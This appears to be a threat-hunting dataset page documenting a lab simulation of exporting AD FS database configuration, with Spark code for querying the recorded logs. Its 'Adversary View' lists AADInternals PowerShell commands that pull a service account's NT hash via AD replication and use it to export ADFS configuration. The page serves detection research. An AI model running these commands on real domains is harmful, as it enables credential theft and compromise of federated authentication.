Export ADFS Database Configuration Remotely

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2021/04/27

Modification Date

2021/04/27

Tactics

[‘TA0008’]

Techniques

[‘T0000’]

Tags

None

Dataset Description

This dataset represents a threat actor exporting the AD FS database configuration remotely over http.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Lab VM

PowerShell Module

Export-AADIntADFSConfiguration

Adversary View

# ADFS Service Account
$UserObjectGUID = 'd1713029-72e2-4101-8486-1db074944f23'
# Domain Admin credentials
$credentials = get-credential
# Get Hash via AD replication
$Hash = Get-AADIntADUserNTHash -ObjectGuid $UserObjectGUID -Credentials $credentials -Server 'DC01.blacksmith.local' -AsHex
# Retrieve AD FS database configuration over HTTP
$ADFSDatabaseConfig = Export-AADIntADFSConfiguration -Hash '97bff5626068f351a5f9891b97b04640' -SID 'S-1-5-21-3226634481-2224579835-4276826623-1103' -Server ADFS01.blacksmith.local

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/aadinternals_export_adfsdatabaseconfig_remotely.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)